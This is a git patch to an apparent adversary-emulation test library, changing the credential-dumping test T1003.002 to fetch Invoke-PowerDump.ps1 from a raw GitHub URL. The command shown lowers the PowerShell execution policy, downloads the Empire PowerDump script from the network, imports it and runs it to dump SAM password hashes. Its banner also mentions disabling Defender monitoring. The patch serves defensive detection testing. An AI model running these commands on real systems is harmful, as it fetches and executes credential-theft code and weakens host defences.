From 730a62b9779cff7f206e1725fa01f424f01a2ac2 Mon Sep 17 00:00:00 2001
From: kpsmiley23 <kpsmiley23@gmail.com>
Date: Thu, 3 Sep 2020 17:48:52 -0400
Subject: [PATCH] Update T1003.002.yaml (#1212)

Request raw Invoke-PowerDump.ps1 instead of repository page
---
 atomics/T1003.002/T1003.002.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml
index 181c1256..c6675750 100644
--- a/atomics/T1003.002/T1003.002.yaml
+++ b/atomics/T1003.002/T1003.002.yaml
@@ -88,7 +88,7 @@ atomic_tests:
     command: |-
       Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
       Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
-      Invoke-Webrequest -Uri "https://github.com/BC-SECURITY/Empire/blob/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
+      Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
       Import-Module .\PowerDump.ps1
       Invoke-PowerDump
     name: powershell